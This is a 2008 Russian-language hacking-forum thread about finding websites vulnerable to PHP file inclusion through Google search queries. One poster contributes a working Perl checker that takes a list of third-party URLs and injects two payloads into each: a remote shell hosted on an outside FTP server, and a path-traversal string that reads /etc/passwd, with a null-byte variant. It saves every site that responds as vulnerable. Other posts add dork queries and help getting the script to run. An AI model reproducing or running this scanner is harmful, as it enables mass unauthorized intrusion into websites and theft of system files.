Google Remote File Inclusion Scanner

Discussion in 'Уязвимости' started by mailbrush, 4 Oct 2008.

  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    [​IMG]

    Как пользоваться:

    Заливаем скрипт на сервак и запускаем.

    1.Variable: Здесь Вы должны ввести переменную которую вы хотите искать
    Например : page= , pag= , q= , a= , n= и тд.
    2. Google page: тут предлагаю писать 0, это даст возможность посмотреть результатов.
    3. Search string: сюда мы пишем только запросы ввиде allinurl:".php?a=" .htm заменить на .php?a=

    Скачать:


    (c) secnull
     
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    писал подобную херь на перле, где то на винте валяется, только под icq.com, а не гугл
     
  3. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    565
    Likes Received:
    265
    Reputations:
    17
    Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)
     
  4. ruzzer

    ruzzer Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    43
    Likes Received:
    10
    Reputations:
    3
    Как я понял, для поиска сайтов, с возможной уязвимотью php-inj. Тоже самое можно сделать просто поиском в гугле, запросом
    allinurl:".php?page="
     
  5. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    может конечно глупый вопрос но тулза чекает инклуды после нахождения большой базы
    Спайдер
    давай выкладывай свой супер мего скриптег =) хочеться глянуть возможно даже в ЛС ;)
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    satana8920, оказалось что не совсем то же самое, вобщем вот код

    Code:
    #!perl
    use LWP
    $list = ""; # Путь к файлу с сылками
    $res = ""; # Путь к сохранению результата
    $rshell = 'ftp://omfg0o:[email protected]/antichat.php?.html'; # Удалённый инклуд, поменять на своё значение
    $lshell = '/../../../../../../../../../../../../../../../../../../../../etc/passwd'; # Локальный инклуд
    $timeout = 15;
    $var = "$ARGV[0]";
    open (LIST, "$list") or die $!;
    open (RES, ">$res") or die $!;
    while (<LIST>) {
    	$_=~ /$var/;
    	$url = "$`"."$var"."="."$rshell";
    	print "Now checking : $url\n";
    	$agent = LWP::UserAgent->new();
    	$agent -> timeout($timeout);
    	$req = HTTP::Request->new(GET => $url);
    	$resp = $agent->request($req);
    	$body = $resp->content;
    	
    	if ($body =~ m/ANTICHAT/) {
    		print RES "$url\n";
    	}
    	$url = "$`"."$var"."="."$lshell";
    	print "Now checking : $url\n";
    	$req = HTTP::Request->new(GET => $url);
    	$resp = $agent->request($req);
    	$body = $resp->content;
    	
    	if ($body =~ m/root:x:0:0/) {
    		print RES "$url\n";
    	} else {
    	$url = "$`"."$var"."="."$lshell".'%00';
    	print "Now checking : $url\n";
    	$req = HTTP::Request->new(GET => $url);
    	$resp = $agent->request($req);
    	$body = $resp->content;
    	
    	if ($body =~ m/root:x:0:0/) {
    		print RES "$url\n";
    	}
    	}
    }
    
    Вобщем это чекер локальных и удалённых инклудов, работает он с файлом ссылок. Получить этот файл ссылок можно каким нить гугл грабером или моей тузлой для icq.com
    https://forum.antichat.ru/thread56927.html

    работоспособность этих двух скриптов не гарантирую, если чё пиши в пм =)
     
    2 people like this.
  7. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    посмотри 9ю строчку че то у мну не пашет
    говорит с 9ой строкой что то
     
  8. Vandam

    Vandam Banned

    Joined:
    3 Aug 2008
    Messages:
    17
    Likes Received:
    39
    Reputations:
    0
    тоже самое((( :mad:
     
    4 people like this.
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    код почитайте

    $list = ""; # Путь к файлу с сылками
    $res = ""; # Путь к сохранению результата
     
    1 person likes this.
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    и вообще почитайте мой пост
     
  11. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    так как у мну лежит все в одной папке у меня это так выглЯдит:
    $list = "parse.txt"; # Путь к файлу с сылками
    $res = "res.txt"; # Путь к сохранению результата